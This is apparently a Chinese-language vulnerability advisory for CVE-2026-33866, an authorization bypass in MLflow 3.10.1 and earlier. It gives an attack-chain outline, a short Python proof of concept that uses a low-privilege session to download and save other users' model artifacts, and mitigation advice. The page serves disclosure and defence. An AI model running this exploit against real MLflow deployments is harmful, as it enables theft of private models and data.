IPBUF安全漏洞报告
English
CVE-2026-33866 CVSS 4.3 中危

CVE-2026-33866 MLflow授权绕过漏洞

披露日期: 2026-04-07
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-33866
漏洞类型
权限绕过
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
MLflow

相关标签

权限绕过MLflowIDOR信息泄露CVSS-4.3

漏洞概述

MLflow 在处理用于下载保存模型工件的 AJAX 端点时存在授权绕过漏洞。由于缺少访问控制验证,未经授权的低权限用户可以直接查询该端点,绕过权限检查,从而下载本无权访问的实验模型工件。该漏洞影响 MLflow 3.10.1 及之前的版本。

技术细节

该漏洞源于 MLflow 后端处理模型工件下载请求时,未实施严格的权限校验机制。具体而言,用于获取保存模型工件的 AJAX 端点存在逻辑缺陷,仅要求用户具备基本的登录权限(低权限),而未验证该用户是否对请求的目标实验 ID 或运行 ID 拥有合法的访问授权。攻击者可以利用这一缺陷,通过直接发送构造好的 HTTP 请求(如修改 URL 中的 ID 参数),遍历并下载本应受保护的模型工件。这是一种典型的水平越权漏洞,导致敏感的机器学习模型数据在未经授权的情况下被窃取。

攻击链分析

STEP 1
Reconnaissance
识别目标网络上运行的 MLflow 服务,确认其版本在受影响范围内(3.10.1及以下)。
STEP 2
Initial Access
获取一个低权限的 MLflow 账户(例如通过注册或使用默认访客权限)。
STEP 3
Exploitation
利用该账户身份,直接向下载模型工件的 AJAX 端点发送请求,并在参数中指定目标实验或运行ID。
STEP 4
Exfiltration
服务器由于未验证权限,返回了请求的模型文件,攻击者成功下载敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target MLflow instance URL target_host = "http://target-mlflow-server:5000" # The vulnerable AJAX endpoint for downloading artifacts endpoint = "/ajax-api/2.0/mlflow/artifacts/download" # Attacker's low-privilege session cookie (obtained via login) attacker_cookie = "mlflow-session-cookie=low_priv_user_token" # Headers including the session headers = { "Cookie": attacker_cookie, "User-Agent": "Mozilla/5.0" } # Parameters specifying the unauthorized resource to download # run_id: The ID of the experiment/model the attacker should not access # path: The specific file within the artifacts params = { "run_id": "sensitive_run_id_uuid", "path": "model/data.pkl" } # Send the GET request to exploit the bypass response = requests.get(target_host + endpoint, headers=headers, params=params) if response.status_code == 200: print("[+] Exploit successful! Downloaded artifact.") # Save the stolen artifact with open("stolen_artifact.pkl", "wb") as f: f.write(response.content) else: print(f"[-] Failed to download. Status: {response.status_code}")

影响范围

MLflow <= 3.10.1

防御指南

临时缓解措施
建议立即将 MLflow 升级到修复了此漏洞的版本。如果暂时无法升级,应通过网络边界设备(如 WAF)限制对特定 API 路径(如 /ajax-api/.../artifacts/download)的访问,或者禁用未授权用户的注册功能,并结合网络隔离策略保护 MLflow 后端服务。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表